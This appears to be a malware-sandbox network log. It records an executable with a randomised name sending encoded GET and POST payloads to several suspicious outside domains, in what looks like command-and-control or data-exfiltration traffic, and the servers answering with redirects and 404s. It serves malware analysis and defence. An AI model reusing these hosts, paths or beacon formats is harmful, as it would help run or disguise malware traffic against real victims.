                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 41 2b 56 6f 48 31 59 61 41 76 47 67 36 6e 4a 2b 6b 46 45 74 41 57 31 4e 61 31 75 65 66 78 71 58 4e 77 58 6d 69 39 35 70 34 6e 37 6d 78 44 79 32 52 35 66 44 2f 63 75 33 48 76 4f 77 44 62 71 54 4f 61 72 56 42 4d 52 71 53 59 51 62 53 50 46 64 30 79 55 53 33 4b 4f 74 52 71 41 47 34 7a 59 6e 55 77 52 76 49 6c 55 55 4a 51 37 75 41 37 4d 42 45 54 56 31 43 74 6f 6d 50 6d 76 45 6f 4b 32 56 4c 43 33 42 55 69 34 62 7a 38 68 48 5a 39 61 68 61 63 34 6d 2b 77 62 46 52 79 55 4a 6c 7a 4d 75 55 53 79 2b 56 6b 71 66 63 43 43 5a 47 77 76 44 7a 76 50 34 33 48 65 69 66 6b 6b 69 6c 38 54 65 58 67 71 76 5a 62 30 6d 72 79 6a 53 68 54 56 61 57 2b 2b 4f 67 36 56 6b 44 56 33 66 65 59 32 6f 6d 72 73 54 49 54 45 6a 52 74 34 43 34 52 46 67 43 64 55 2b 6a 2f 2b 54 6b 31 79 43 61 38 62 47 2b 46 6c 74 51 4b 58 46 53 57 43 35 6b 55 38 42 4d 4d 67 65 76 43 77 6f 51 7a 32 77 67 41 70 76 76 6f 38 41 6b 41 49 38 7a 36 47 38 38 50 4b 4e 76 66 48 53 49 39 55 55 69 55 77 68 77 67 52 41 72 75 73 [TRUNCATED]
                              Data Ascii: bX=ezGJx9beP/VwA+VoH1YaAvGg6nJ+kFEtAW1Na1uefxqXNwXmi95p4n7mxDy2R5fD/cu3HvOwDbqTOarVBMRqSYQbSPFd0yUS3KOtRqAG4zYnUwRvIlUUJQ7uA7MBETV1CtomPmvEoK2VLC3BUi4bz8hHZ9ahac4m+wbFRyUJlzMuUSy+VkqfcCCZGwvDzvP43Heifkkil8TeXgqvZb0mryjShTVaW++Og6VkDV3feY2omrsTITEjRt4C4RFgCdU+j/+Tk1yCa8bG+FltQKXFSWC5kU8BMMgevCwoQz2wgApvvo8AkAI8z6G88PKNvfHSI9UUiUwhwgRArusgTxY/rFLVDHq0q3vLE87hqGYHFtz5LrbKUiivcdZyYUbRdfzy+blS8+akOms3jFpWmB4Stf8N2eu3ElzLZNlfLClVcAgy65qYwvNJGctspRnb0Eq3HmCIZTPttiBVyVNq3qzlp57YuMOnW/24UXFG+F2gMSAVhfiVjjPttRnw4w1iscAAN04z/T4Yp5EfpMl1LmDSrkFBjiINS6032WGnS2lNsJdRr3dN1tlekdRpAwuyGvEqJ5MwGGTrYYVNwVj6HsM/3UZDTVC3ZFrsw6cmQybsi4AonAT9IP039/p0oTVjNcpBXSPjuqphggFLg3SXOuK1iveJyV+xjc5j36GpGuNrtqRGUEgqmvRU4l8G6FyDvkdZq+2GBNWyHNJKeVZ06gUuSRY2Ux/buJanUGLDpUh8KL/jTbHrALQexkSQM4lEFczdgi6m9qds1mC6YCwf2lULcMnxEM/CD9us0vkMT98ynWvQpBjwiHJmGv20SHOBddY1FsFdhFpslgAPgQmmxty5Qxs5jENZhcjXBLyrb3Z6Vcps7YdwVHWua3NlQTRFBADMcKXr4mBdTvCQ1bp+KDQLUpQGyk8h5H6XxitJYum5RTM3+PFIABONUBzxGp4fTrx2BbrZNO1MTthGQ7IJL/0JHI23dZrJzYIhN31mau9Lgop0aPynY [TRUNCATED]


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.55865785.159.66.9380728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:42.727197886 CEST470OUTGET /k2vl/?bX=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.golbasi-nakliyat.xyz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:30:43.414175987 CEST225INHTTP/1.1 404 Not Found
                              Server: nginx/1.14.1
                              Date: Mon, 16 Sep 2024 07:30:43 GMT
                              Content-Length: 0
                              Connection: close
                              X-Rate-Limit-Limit: 5s
                              X-Rate-Limit-Remaining: 19
                              X-Rate-Limit-Reset: 2024-09-16T07:30:48.3042146Z


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.558658185.173.111.7680728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:48.493576050 CEST742OUTPOST /lwt6/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.mfgamecompany.shop
                              Origin: http://www.mfgamecompany.shop
                              Referer: http://www.mfgamecompany.shop/lwt6/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 4a 4f 41 5a 7a 55 76 67 78 4f 57 53 34 52 79 55 31 48 59 6f 30 2f 48 52 50 31 38 52 39 34 68 45 6a 51 63 37 61 6c 46 7a 54 2b 72 51 35 49 62 6b 53 31 42 45 2f 36 76 6f 44 4f 61 46 44 33 32 6b 48 2f 56 37 53 2b 6c 37 46 57 34 30 34 6d 44 31 44 66 45 54 37 6b 63 44 66 4d 69 4f 42 51 35 50 4c 6e 4c 4c 52 36 39 67 4f 76 70 6d 76 77 53 75 66 68 71 62 35 6e 4c 7a 4b 75 6f 33 42 77 47 31 4d 64 6c 68 44 36 6a 61 55 62 50 35 77 5a 57 6b 54 47 4f 57 76 6b 31 64 76 4e 2f 67 52 2f 73 68 7a 64 36 54 69 61 58 35 48 77 39 57 4c 55 2b 43 30 41 4b 4b 5a 52 7a 5a 4f 51 6b 3d
                              Data Ascii: bX=u91ZDexvlNKHJOAZzUvgxOWS4RyU1HYo0/HRP18R94hEjQc7alFzT+rQ5IbkS1BE/6voDOaFD32kH/V7S+l7FW404mD1DfET7kcDfMiOBQ5PLnLLR69gOvpmvwSufhqb5nLzKuo3BwG1MdlhD6jaUbP5wZWkTGOWvk1dvN/gR/shzd6TiaX5Hw9WLU+C0AKKZRzZOQk=
                              Sep 16, 2024 09:30:49.151998997 CEST1086INHTTP/1.1 301 Moved Permanently
                              Connection: close
                              content-type: text/html
                              content-length: 795
                              date: Mon, 16 Sep 2024 07:30:49 GMT
                              server: LiteSpeed
                              location: https://www.mfgamecompany.shop/lwt6/
                              platform: hostinger
                              panel: hpanel
                              content-security-policy: upgrade-insecure-requests
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.558659185.173.111.7680728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:51.032973051 CEST762OUTPOST /lwt6/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.mfgamecompany.shop
                              Origin: http://www.mfgamecompany.shop
                              Referer: http://www.mfgamecompany.shop/lwt6/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 50 71 38 5a 79 7a 44 67 6d 65 57 52 39 52 79 55 76 33 5a 76 30 2b 37 52 50 78 6b 42 2b 4c 56 45 67 31 34 37 62 68 5a 7a 47 2b 72 51 68 34 61 75 57 31 42 4c 2f 36 71 66 44 4d 65 46 44 7a 65 6b 48 39 4e 37 54 4a 35 30 46 47 34 32 78 47 44 33 4a 2f 45 54 37 6b 63 44 66 4e 48 72 42 51 68 50 4c 58 37 4c 52 59 56 6a 49 66 70 6c 6d 51 53 75 62 68 71 66 35 6e 4c 52 4b 75 59 52 42 31 61 31 4d 63 56 68 43 76 58 64 64 62 4f 77 74 4a 58 6e 64 48 6e 6c 69 57 35 73 73 72 71 2b 43 2f 73 39 79 72 58 35 34 34 66 52 55 51 52 75 62 48 32 31 6c 77 72 6a 44 79 6a 70 51 48 78 5a 78 39 79 41 43 4b 62 56 64 66 6b 4b 4f 76 53 43 54 62 32 6c
                              Data Ascii: bX=u91ZDexvlNKHPq8ZyzDgmeWR9RyUv3Zv0+7RPxkB+LVEg147bhZzG+rQh4auW1BL/6qfDMeFDzekH9N7TJ50FG42xGD3J/ET7kcDfNHrBQhPLX7LRYVjIfplmQSubhqf5nLRKuYRB1a1McVhCvXddbOwtJXndHnliW5ssrq+C/s9yrX544fRUQRubH21lwrjDyjpQHxZx9yACKbVdfkKOvSCTb2l
                              Sep 16, 2024 09:30:51.696297884 CEST1086INHTTP/1.1 301 Moved Permanently
                              Connection: close
                              content-type: text/html
                              content-length: 795
                              date: Mon, 16 Sep 2024 07:30:51 GMT
                              server: LiteSpeed
                              location: https://www.mfgamecompany.shop/lwt6/
                              platform: hostinger
                              panel: hpanel
                              content-security-policy: upgrade-insecure-requests
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.558660185.173.111.7680728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:53.587518930 CEST1779OUTPOST /lwt6/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.mfgamecompany.shop
                              Origin: http://www.mfgamecompany.shop
                              Referer: http://www.mfgamecompany.shop/lwt6/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 50 71 38 5a 79 7a 44 67 6d 65 57 52 39 52 79 55 76 33 5a 76 30 2b 37 52 50 78 6b 42 2b 4c 4e 45 6a 48 77 37 61 47 74 7a 55 4f 72 51 2f 49 61 76 57 31 42 73 2f 2b 47 54 44 4d 43 2f 44 78 6d 6b 47 65 46 37 43 4c 52 30 51 32 34 32 75 57 44 30 44 66 45 61 37 6b 4e 4b 66 4d 33 72 42 51 68 50 4c 52 66 4c 58 4b 39 6a 54 66 70 6d 76 77 53 71 66 68 71 37 35 6b 36 75 4b 76 73 6e 43 42 57 31 56 38 46 68 42 5a 4c 64 41 72 4f 79 75 4a 58 46 64 48 37 36 69 57 6b 56 73 72 32 59 43 39 73 39 7a 73 69 74 73 62 44 61 42 51 78 61 54 6c 65 33 34 48 50 6e 49 51 2f 6c 53 56 56 74 30 73 6d 55 45 64 7a 68 62 75 39 38 4e 35 32 30 43 66 4b 70 42 4a 36 75 43 30 7a 36 62 6a 50 61 42 7a 4d 46 46 79 69 77 6b 50 67 4b 37 58 4a 2f 4e 56 74 65 55 6f 34 4a 49 56 74 58 6e 45 63 36 51 6b 6e 77 75 62 53 30 35 71 6b 4e 34 63 67 37 51 53 77 38 6b 72 32 33 67 39 58 47 2f 33 65 44 76 34 65 45 75 57 31 63 34 47 43 2f 47 31 6a 32 74 31 52 71 39 66 42 65 2f 73 45 32 51 69 36 5a 4d 2b 72 67 48 47 4e [TRUNCATED]
                              Data Ascii: bX=u91ZDexvlNKHPq8ZyzDgmeWR9RyUv3Zv0+7RPxkB+LNEjHw7aGtzUOrQ/IavW1Bs/+GTDMC/DxmkGeF7CLR0Q242uWD0DfEa7kNKfM3rBQhPLRfLXK9jTfpmvwSqfhq75k6uKvsnCBW1V8FhBZLdArOyuJXFdH76iWkVsr2YC9s9zsitsbDaBQxaTle34HPnIQ/lSVVt0smUEdzhbu98N520CfKpBJ6uC0z6bjPaBzMFFyiwkPgK7XJ/NVteUo4JIVtXnEc6QknwubS05qkN4cg7QSw8kr23g9XG/3eDv4eEuW1c4GC/G1j2t1Rq9fBe/sE2Qi6ZM+rgHGN3OVZ/Ult5ADf7ORIFqM/9I2TEsymwqQo+6hPgFk1F2BUnAmFogNZmSbp+R3IasmEhFDhwabjDRB1573hij4RfuHB3AMNDM9jaKziJS9xjpHz6i3JahY8x1IbjTPh3dNzY0U3DW9jTOcLO6+oKqKeuzv7Vi+MIw0Sjm9oYDRKsLKGl1L9HI5xcMCakJnquXbXli3krtLG8G0FmDHJ9hRYFUM62jAA6ccaKDt1eotSkP4AAoQTME+b5ihEfF8PF/77yjaiweKCO8SDJIuf/H9a+SWoffWto5TF83G5fxjhgIqpGYbYuDI5zHZpxuFDU6BUD0Lgx/GL5qHi+XZR0tdz/hegUIqgiEcFCWRSMg1qsuEjC8QB8QLDlrEh0NEDO7amhM0FcoCY4DHtk2NXWqEGezKXWjJh19fduFmGU/92onWdy9T5QwSpLFH2tpcLqjZplQ6RHTFYwBWftpAKHRnEPI+zW59R31TQIYRfZY1gcbIxlAcxmWfEKyPVEfykRcnWokk2CtQjs7GZHeitKSKKRsgrupXGPPSgOFRGt+wBgMdpMWJtc3apzYriZZQNho7FE3toV4EY6/JHnc4828Hf1y9hHRH1obFRZbqaMtQYjejwHDScj64UIOWEM9jxLkMLxGqpWzlndjKRcpQKKvEl33wy/yhQ5Rb+NF [TRUNCATED]
                              Sep 16, 2024 09:30:54.238173008 CEST1086INHTTP/1.1 301 Moved Permanently
                              Connection: close
                              content-type: text/html
                              content-length: 795
                              date: Mon, 16 Sep 2024 07:30:54 GMT
                              server: LiteSpeed
                              location: https://www.mfgamecompany.shop/lwt6/
                              platform: hostinger
                              panel: hpanel
                              content-security-policy: upgrade-insecure-requests
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.558661185.173.111.7680728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:56.139600992 CEST468OUTGET /lwt6/?bX=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.mfgamecompany.shop
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:30:56.798033953 CEST1233INHTTP/1.1 301 Moved Permanently
                              Connection: close
                              content-type: text/html
                              content-length: 795
                              date: Mon, 16 Sep 2024 07:30:56 GMT
                              server: LiteSpeed
                              location: https://www.mfgamecompany.shop/lwt6/?bX=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ==&RFRd_=tFLD
                              platform: hostinger
                              panel: hpanel
                              content-security-policy: upgrade-insecure-requests
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              17192.168.2.558662203.161.43.22880728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:02.117590904 CEST718OUTPOST /ftr3/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.quilo.life
                              Origin: http://www.quilo.life
                              Referer: http://www.quilo.life/ftr3/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 56 66 6b 73 57 6f 41 47 67 6b 63 35 71 79 78 75 33 6d 4e 61 74 50 4e 36 44 6f 79 51 35 52 47 30 6c 69 62 66 35 42 30 41 50 32 51 63 51 43 54 6e 53 6b 53 4f 69 6e 51 68 6f 65 51 76 65 4e 4f 6c 5a 42 35 56 34 64 61 70 2f 65 42 62 4a 36 4b 5a 31 4d 6b 33 31 75 47 32 47 76 67 51 61 4e 2b 76 71 79 64 54 6d 39 2f 7a 66 35 76 74 39 47 31 35 6b 30 53 57 4c 6c 63 59 41 46 58 4f 6d 76 52 6a 79 57 32 68 57 36 49 50 4b 71 35 37 44 44 66 52 31 4d 33 2f 79 2b 75 4d 54 58 52 42 62 70 63 6c 30 72 36 43 75 48 66 70 6a 43 41 50 34 65 74 4e 64 64 44 47 4f 6c 48 72 59 79 59 3d
                              Data Ascii: bX=2iJzcjLeEdvuVfksWoAGgkc5qyxu3mNatPN6DoyQ5RG0libf5B0AP2QcQCTnSkSOinQhoeQveNOlZB5V4dap/eBbJ6KZ1Mk31uG2GvgQaN+vqydTm9/zf5vt9G15k0SWLlcYAFXOmvRjyW2hW6IPKq57DDfR1M3/y+uMTXRBbpcl0r6CuHfpjCAP4etNddDGOlHrYyY=
                              Sep 16, 2024 09:31:02.718168974 CEST658INHTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:02 GMT
                              Server: Apache
                              Content-Length: 514
                              Connection: close
                              Content-Type: text/html
